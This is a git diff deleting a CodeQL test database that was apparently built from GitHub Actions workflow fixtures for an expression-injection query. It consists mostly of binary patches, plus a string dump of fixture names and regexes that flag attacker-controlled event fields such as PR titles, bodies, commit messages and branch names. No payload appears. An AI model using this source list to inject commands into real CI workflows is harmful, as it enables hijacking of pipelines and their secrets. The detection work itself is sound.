zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi diff --git a/db/db-yaml/default/pools/poolInfo b/db/db-yaml/default/pools/poolInfo deleted file mode 100644 index df3045a1ff5f4f01ad1cca4e97dbff096c69683a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 32 acmZQz00Sl<$;iOKv<5;$1SjTkivs`;zX8+$ diff --git a/db/db-yaml/default/sourceLocationPrefix.rel b/db/db-yaml/default/sourceLocationPrefix.rel deleted file mode 100644 index fde1ac19d2b083530bcab4cb4fd2dcaa285234ab..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 4 LcmZQzU|3lW!zSrk$os%~sBO;^f z^{@6k&ubQk4`)ww^AgAPyqQ!+<^t4j=p&ftQRe(WeMgO;zM;OCePGC`7&3WYZ|0@K zjc2DUIFYlPL*@o(Pl(sFq=Iuv?=r`oI?D5I6>pQ||))Un8v6}{Q ziTa!UC^%P`+x0=s|nS^WPXh)f|s{PvvYinJ__f)tVZyAiSh`i|v{jhpp zX&s{QWra2DEJJF^7{@$Jhu65Pyt(qVc;jD4h6RCzk%L&fh@c!~O5)_>Z9 z2)!FQFXH))N(|0VRvXE#03N9Je^7TS+8gF`zt$hXD(4A>Yd>I&CblS#VbU-s3%Ij& zKt>SVM`h0t+>f45@$T+srDa#x^##qJnS8{K5q5Jszp-jiUp z;#)y&0S}^ff%D=mN;jtloIU@-y)MH`(mxWP^~ARSs`iGcJAM~FtqNL-eo#D(L{Egi zOFZR7YpHV7x>ubcK9x{eJgBv!9hEQPwSJt2riYgbTLfUL9_zwloihypUfFP+&KL8eR${U`(ruD ze;MYXfW7``Tg7*O(fHv;QP;o~M88Y_PH;k%mmh8-^S^liQX!v$Ylz>_-%^*Dzobs6 z{bcZ;!WDuWNL{C1U_M3J(*&?y?O5LQaSmUIy#o%X{Tg?{yC3fydVO`@K5g>BAHzN5 z!#_;MGQ}rn&PAo+j_&Zkh*m<~rR=_NF6=5%lBm6B;nK-GP^e?IOaOPxz zFDf{iiT?ft-$(JUFmKZaAH3M%YO^!Z;nKsIvxWMaIwP~;5|~dc&mh^Wsoofy)ynvr zQvIlvEcA%Q(wQ)xcX>yz2yb{x_S-u-@!1=#c9)1=i~c0FmMS4!a(XKH%^lQ^$lf;5 zOv@u=W93T;H^Z94^!Sn!#^U{~JXyrJN^yR>=XpzRgpTS>em=uJL-iuBjCeOPXBON{ z?RS7r!91R7C-<)eUkG^1SlOK~o%M((BUzt2dBxdUO%;o{{h(o@WEFEVUFSOW#%v0^ zzM#34+LXAy%>O73BNl)xAZROJslC^s{5?Z z_U8e|oE@vRX0I!Co;v4~@qxpYWU&!hs~z6tWu}J8J-5M+;~8xPPL6>4qt(#wHsx)D zbWzF8MH>Xy75uZ(T=<3a#+?{mR$O6s!I`r%KP&#@;CNJH>L<#a8{GdG{c6+{`YDaJ zT&St?=2_C;hhISMRJHOC_>P(_{K^7)D%n?*7f;^TO_85~cdOs|k<#YFzo;}Ng}{R$ zQ_L_j273L;nJZZvoy?@nX{nUdV)gE(%=0L7;ws+E$Ao_moKUdg|L=KPvKpw&>k8Za zcD&~jwHacT=mnVw~P$Pva zOpim|Q63$?5N{^xl8_m|Ex;4#L1z>~9HqBaxSm?-3Vxn@2P<94UYUS5Sx-Aa`vA{L zYmz=!-7ydD9(x_A9pH8Jg47zy?>q|mJM{rnEjG9zY%AE3|ZHOL2 zzQdSK2(whOCgJa^^6Ww}xPo?2eGNDnyCew$v$0_g)}x1Yl&RP$9l4b^Pm8~mQnguAAGo3{N2qNz%? diff --git a/db/db-yaml/default/strings/0/metadata/page-000000 b/db/db-yaml/default/strings/0/metadata/page-000000 deleted file mode 100644 index cb4291b6b3b65463c7b9660f099668c0cfc4fe35..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 16384 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 Bc#Z%7 diff --git a/db/db-yaml/default/strings/0/pageDump/page-000000000 b/db/db-yaml/default/strings/0/pageDump/page-000000000 deleted file mode 100644 index eec9231ab07..00000000000 --- a/db/db-yaml/default/strings/0/pageDump/page-000000000 +++ /dev/null @@ -1,2 +0,0 @@ -tag:yaml.org,2002:(.*)mapstrboolseqintworkflow_call\$\{\{\s*[A-Za-z0-9_\[\]\*\(\)\.\-]+\s*\}\}octo-org/source-repo/.github/workflows/workflow.yml*output.workflow-outputFooahmadnassri/action-changed-filesoutput.filesPR changed filesoutput.jsondorny/paths-filteroutput.changesfranzdiebold/github-env-vars-actionoutput.CI_PR_DESCRIPTIONPR bodyoutput.CI_PR_TITLEPR titlejitterbit/get-changed-filesoutput.alloutput.addedoutput.modifiedoutput.removedoutput.renamedoutput.added_modifiedoutput.deletedkhan/pull-request-comment-triggeroutput.comment_bodypull_request_commenttj-actions/branch-namesoutput.current_branchPR current branchoutput.head_ref_branchPR head branchoutput.ref_branchBranch tirggering workflow runtj-actions/changed-filesoutput.added_filesoutput.copied_filesoutput.deleted_filesoutput.modified_filesoutput.renamed_filesoutput.all_old_new_renamed_filesoutput.type_changed_files${{ steps.changed-files.outputs.all_changed_files }}${{ secrets.DYNAMOBOTTOKEN }}${{ github.event.issue.url }}${{ github.actor }}${{ env.template }}${{ env.acceptable_missing_info }}${{ secrets.GITHUB_TOKEN }}${{env.comment_intro}}${{env.close_issue_comment}}${{env.info_needed}}${{env.issue_label}}${{env.needs_more_info_comment}}${{env.specific_info}}${{env.analysis_response}}${{env.greetings_comment}}${{ env.issue_json_string }}${{ github.repository }}${{github.event.after}}${{ env.ISSUE_BODY_PARSED }}${{env.user_name}}${{env.auto_branch}}${{env.destination_branch}}${{env.pr_message}}${{ github.event.discussion.title }}${{ github.event.discussion.body }}${{ github.event.pages[1].title }}${{ github.event.pages[11].title }}${{ github.event.pages[0].page_name }}${{ github.event.pages[2222].page_name }}${{ toJSON(github.event.pages.*.title) }}${{ steps.trim-url.outputs.trimmed_url }}${{needs.job1.outputs.job_output}}${{ env.global_env }}${{ env.test }}${{ env.job_env }}${{ env.step_env }}\$\{\{\s*([A-Za-z0-9_\[\]\*\((\)\.\-]+)\s*\}\}${{ matrix.language }}${{steps.no-step.outputs.foo}}github.event.comment.bodyinputs.who-to-greet${{ github.event.pull_request.title }}${{ github.event.pull_request.body }}${{ github.event.pull_request.head.label }}${{ github.event.pull_request.head.repo.default_branch }}${{ github.event.pull_request.head.repo.description }}${{ github.event.pull_request.head.repo.homepage }}${{ github.event.pull_request.head.ref }}${{ github.event.review.body }}output.unmerged_filesoutput.unknown_filesoutput.all_changed_and_modified_filesoutput.all_changed_filesoutput.other_changed_filesoutput.all_modified_filesoutput.other_modified_filesoutput.other_deleted_filesoutput.modified_keysoutput.changed_keystj-actions/verify-changed-filesoutput.changed-filestzkhan/pr-update-actionoutput.headMatchxt0rted/slash-command-actionoutput.command-arguments${{ github.head_ref }}${{ github.event.commits[11].message }}${{ github.event.commits[11].author.email }}${{ github.event.commits[11].author.name }}${{ github.event.head_commit.author.email }}${{ github.event.head_commit.author.name }}${{ github.event.head_commit.committer.email }}${{ github.event.head_commit.committer.name }}${{ github.event.commits[11].committer.email }}${{ github.event.commits[11].committer.name }}${{steps.summary.outputs.value}}${{steps.summary.outputs.foo}}${{ steps.source.outputs.all_changed_files_count }}${{ github.event.workflow_run.display_title }}${{ github.event.workflow_run.head_commit.message }}${{ github.event.workflow_run.head_commit.author.email }}${{ github.event.workflow_run.head_commit.author.name }}${{ github.event.workflow_run.head_commit.committer.email }}${{ github.event.workflow_run.head_commit.committer.name }}${{ github.event.workflow_run.head_branch }}${{ github.event.workflow_run.head_repository.description }}github.event.issue.titleenv.ISSUE_TITLEsteps.remove_quotations.outputs.replacedsteps.changed-files.outputs.all_changed_filesgithub.event.issue.bodyenv.content_analysis_responsesecrets.DYNAMOBOTTOKENgithub.event.issue.urlgithub.actorenv.ISSUE_BODYenv.templateenv.acceptable_missing_infosecrets.GITHUB_TOKENenv.comment_introenv.close_issue_commentenv.info_neededenv.issue_labelenv.needs_more_info_commentenv.specific_infoenv.analysis_responseenv.greetings_commentsteps.remove_quotes.outputs.replacedgithub.event.issue.numberenv.issue_json_stringsecrets.DYNAMO_ISSUES_TOKENgithub.repositorygithub.event.aftergithub.event.commits[0].messageenv.ISSUE_BODY_PARSEDenv.user_nameenv.auto_branchenv.destination_branchenv.pr_messagegithub.event.discussion.titlegithub.event.discussion.bodygithub.event.pages[1].titlegithub.event.pages[11].titlegithub.event.pages[0].page_namegithub.event.pages[2222].page_nametoJSON(github.event.pages.*.title)steps.extract-url.outputs.initial_urlsteps.curl.outputs.redirected_urlsteps.trim-url.outputs.trimmed_urlsteps.step.outputs.valuesteps.source.outputs.all_changed_filesalways()needs.job1.outputs.job_outputenv.global_envenv.testenv.job_envenv.step_envsteps.set-matrix.outputs.all_changed_filesfromJSON(needs.create-matrix.outputs.matrix)matrix.languagegithub.event.head_commit.messagesteps.no-step.outputs.foogithub.event.pull_request.titlegithub.event.pull_request.bodygithub.event.pull_request.head.labelgithub.event.pull_request.head.repo.default_branchgithub.event.pull_request.head.repo.descriptiongithub.event.pull_request.head.repo.homepagegithub.event.pull_request.head.refgithub.event.review.bodygithub.head_refgithub.event.commits[11].messagegithub.event.commits[11].author.emailgithub.event.commits[11].author.namegithub.event.head_commit.author.emailgithub.event.head_commit.author.namegithub.event.head_commit.committer.emailgithub.event.head_commit.committer.namegithub.event.commits[11].committer.emailgithub.event.commits[11].committer.namesteps.summary.outputs.valuesteps.summary.outputs.foosteps.source.outputs.all_changed_files_countsteps.step2.outputs.teststeps.step0.outputs.valuesteps.step1.outputs.MSGgithub.event.workflow_run.display_titlegithub.event.workflow_run.head_commit.messagegithub.event.workflow_run.head_commit.author.emailgithub.event.workflow_run.head_commit.author.namegithub.event.workflow_run.head_commit.committer.emailgithub.event.workflow_run.head_commit.committer.namegithub.event.workflow_run.head_branchgithub.event.workflow_run.head_repository.descriptionmerge.*/(([^/]*?)(?:\.([^.]*))?)argus_case_study.ymlargus_case_studyymlchanged-files.ymlcomment_issue.ymlcomment_issuecomment_issue_newline.ymlcomment_issue_newlinecross1.ymlcross1cross2.ymlcross2cross3.ymlcross3discussion.ymldiscussion_comment.ymlgollum.ymlimage_link_generator.ymlimage_link_generatorinter-job.ymlinter-jobissues.yamlyamlmatrix.ymlno-flow1.ymlno-flow1no-flow2.ymlno-flow2pull_request_review.ymlpull_request_review_comment.ymlpull_request_target.ymlpush.ymlsimple1.ymlsimple2.ymlsimple2test.ymlworkflow_run.ymlaction.ymlaction([^/]+)/([^/@]+)@(.+)v2frabertreplace-string-action1.2v4tj-actionsv40github-scriptv3actions-ecosystemaction-regex-matchv2.5setup-dotnetv1.2mad9000actions-find-and-replace-string3([^/]+)/([^/]+)/([^@]+)@(.+)actions/checkoutfrabert/replace-string-actionactions/github-scriptactions-ecosystem/action-regex-matchactions/setup-dotnetmad9000/actions-find-and-replace-string\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*committer\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*message\b\bgithub\s*\.\s*head_ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*body\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*title\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*label\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*homepage\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*default_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*display_title\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_repository\b\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*email\bexit name: Issue Workflowexit name: CIexit on: issue_commentexit name: I ... edicterexit name: Cherry pickingexit on: discussionexit on: dis ... commentexit on: gollumexit name: I ... cessingexit on: pushexit on: issuesexit name: " ... nguage"exit on: pul ... _reviewexit on: pul ... commentexit on: pul ... _targetexit on:exit name: 'test'exit name: 'Hello World'enter name: Issue Workflowenter name: CIenter on: issue_commententer name: I ... edicterenter name: Cherry pickingenter on: discussionenter on: dis ... commententer on: gollumenter name: I ... cessingenter on: pushenter on: issuesenter name: " ... nguage"enter on: pul ... _reviewenter on: pul ... commententer on: pul ... _targetenter on:enter name: 'test'enter name: 'Hello World'exit name: Issue Workflow (normal)exit name: CI (normal)exit on: issue_comment (normal)exit name: I ... edicter (normal)exit name: Cherry picking (normal)exit on: discussion (normal)exit on: dis ... comment (normal)exit on: gollum (normal)exit name: I ... cessing (normal)exit on: push (normal)exit on: issues (normal)exit name: " ... nguage" (normal)exit on: pul ... _review (normal)exit on: pul ... comment (normal)exit on: pul ... _target (normal)exit on: (normal)exit name: 'test' (normal)exit name: 'Hello World' (normal)input testocto-org/sink-repo/.github/workflows/workflow.ymlinput.config-pathexpression-injectionconfig-path.github/workflows/argus_case_study.yml.github/workflows.github.github/workflows/changed-files.yml.github/workflows/comment_issue.yml.github/workflows/comment_issue_newline.yml.github/workflows/cross1.yml.github/workflows/cross2.yml.github/workflows/cross3.yml.github/workflows/discussion.yml.github/workflows/discussion_comment.yml.github/workflows/gollum.yml.github/workflows/image_link_generator.yml.github/workflows/inter-job.yml.github/workflows/issues.yaml.github/workflows/matrix.yml.github/workflows/no-flow1.yml.github/workflows/no-flow2.yml.github/workflows/pull_request_review.yml.github/workflows/pull_request_review_comment.yml.github/workflows/pull_request_target.yml.github/workflows/push.yml.github/workflows/simple1.yml.github/workflows/simple2.yml.github/workflows/test.yml.github/workflows/workflow_run.ymlaction1/action.ymlaction1action2/action.ymlaction2action.yaml\bsteps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\binputs\.([A-Za-z0-9_-]+)\b\bneeds\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)toJSON\(inputs\.([A-Za-z0-9_-]+)\)fromJSON\(inputs\.([A-Za-z0-9_-]+)\)\bgithub\.event\.inputs\.([A-Za-z0-9_-]+)\btoJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)fromJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)\bjobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\bmatrix\.([A-Za-z0-9_-]+)\btoJSON\(matrix\.([A-Za-z0-9_-]+)\)fromJSON\(matrix\.([A-Za-z0-9_-]+)\)\benv\.([A-Za-z0-9_-]+)\btoJSON\(env\.([A-Za-z0-9_-]+)\)fromJSON\(env\.([A-Za-z0-9_-]+)\)Job: redirectIssueJob: changed_filesJob: echo-chamberJob: echo-chamber2Job: echo-chamber3Job: checkIssueInformationJob: issue_type_PredicterJob: cherry_pickJob: process-image-urlJob: job1Job: job2Job: create-matrixJob: analyzeJob: simple1Job outputs nodeUses StepRun StepRun Step: check-infoRun Step: extract-urlRun Step: curlRun Step: trim-urlRun Step: sinkRun Step: no-stepRun Step: flowRun Step: no-flowRun Step: step1Run Step: step2Uses Step: remove_quotationsUses Step: changed-filesUses Step: regex-matchUses Step: remove_quotesUses Step: sourceUses Step: stepUses Step: set-matrixUses Step: summaryUses Step: 